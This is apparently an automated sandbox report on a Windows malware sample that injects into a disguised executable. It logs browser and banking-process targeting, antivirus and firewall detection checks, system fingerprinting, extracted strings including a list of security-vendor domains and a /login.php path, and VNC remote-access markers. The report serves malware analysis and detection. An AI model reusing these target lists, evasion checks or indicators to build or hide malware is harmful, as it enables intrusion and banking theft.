Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A41000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A92000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 800000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 801000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 802000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 852000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1190000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1191000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1192000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 11E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1030000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1031000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1032000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1082000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 930000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 931000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 932000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 982000	Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	2_2_02C86370
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	6_2_01756370
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	7_2_03116370
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	10_2_01536370

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	File opened: CA HIPS KmxAgent	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	File opened: Agnitum Outpost firewal \pipe\acsipc_server	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Window found: AVP NULL ____AVP.Root	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened: CA HIPS KmxAgent	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened: Agnitum Outpost firewal \pipe\acsipc_server	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Window found: AVP NULL ____AVP.Root	Jump to behavior

Source: NcYLgtXIKJgHj.exe, 00000006.00000000.2488459806.0000000001B70000.00000002.00000001.00040000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000007.00000000.2490252189.0000000001920000.00000002.00000001.00040000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000000A.00000000.2497138621.0000000001B40000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: Bpfz752pYZ.exe, Bpfz752pYZ.exe, 00000000.00000003.2123232589.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, Bpfz752pYZ.exe, 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2651597551.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: NcYLgtXIKJgHj.exe, 00000006.00000000.2488459806.0000000001B70000.00000002.00000001.00040000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000007.00000000.2490252189.0000000001920000.00000002.00000001.00040000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000000A.00000000.2497138621.0000000001B40000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: NcYLgtXIKJgHj.exe, 00000006.00000000.2488459806.0000000001B70000.00000002.00000001.00040000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000007.00000000.2490252189.0000000001920000.00000002.00000001.00040000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000000A.00000000.2497138621.0000000001B40000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: Bpfz752pYZ.exe, 00000000.00000003.2123232589.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, Bpfz752pYZ.exe, 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, 00000002.00000003.2651597551.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3\....\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xc:\windowsc:\windows\explorer.exeShell_TrayWnd

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: 0_2_00412FF0 cpuid

0_2_00412FF0

Source: C:\Windows\apppatch\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\82c31ddd\debug_15;Nov;2024_18;56;47.log VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\82c31ddd\scr.bmp VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\82c31ddd\sysinfo.log VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: 0_2_00402240 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,

0_2_00402240

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: 0_2_00403900 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,

0_2_00403900

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02C74920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,IsUserAnAdmin,IsUserAnAdmin,WriteFile,WriteFile,GetHandleInformation,CloseHandle,

2_2_02C74920

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: 0_2_004033A0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,

0_2_004033A0

Remote Access Functionality

Contains VNC / remote desktop functionality (version string found)

Source: Bpfz752pYZ.exe	String found in binary or memory: RFB 003.006
Source: Bpfz752pYZ.exe, 00000000.00000003.2123232589.00000000006F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: Bpfz752pYZ.exe, 00000000.00000003.2123232589.00000000006F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: Bpfz752pYZ.exe, 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: RFB 003.006
Source: Bpfz752pYZ.exe, 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe	String found in binary or memory: RFB 003.006
Source: svchost.exe	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.2651597551.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.2651597551.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000003.2136779480.0000000000881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.2136779480.0000000000881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3391913803.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3391913803.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3391439892.00000000029A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3391439892.00000000029A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3391439892.00000000029F3000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3391439892.00000000029F3000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000006.00000002.2562028304.0000000001740000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000006.00000002.2562028304.0000000001740000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000006.00000002.2561383940.00000000016E0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000006.00000002.2561383940.00000000016E0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000007.00000002.2554723271.0000000002FA0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000007.00000002.2554723271.0000000002FA0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000007.00000002.2555462875.0000000003100000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000007.00000002.2555462875.0000000003100000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000000A.00000002.2576688656.0000000001520000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000000A.00000002.2576688656.0000000001520000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000000A.00000002.2575020460.00000000014C0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000000A.00000002.2575020460.00000000014C0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000000E.00000002.2558937111.0000000002920000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000000E.00000002.2558937111.0000000002920000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000000E.00000002.2560722712.0000000002AC0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 0000000E.00000002.2560722712.0000000002AC0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000010.00000002.2538477716.0000000002A60000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000010.00000002.2538477716.0000000002A60000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000010.00000002.2535763642.0000000002790000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000010.00000002.2535763642.0000000002790000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000014.00000002.2584784821.00000000027D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000014.00000002.2584784821.00000000027D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000014.00000002.2583716021.0000000002650000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: NcYLgtXIKJgHj.exe, 00000014.00000002.2583716021.0000000002650000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
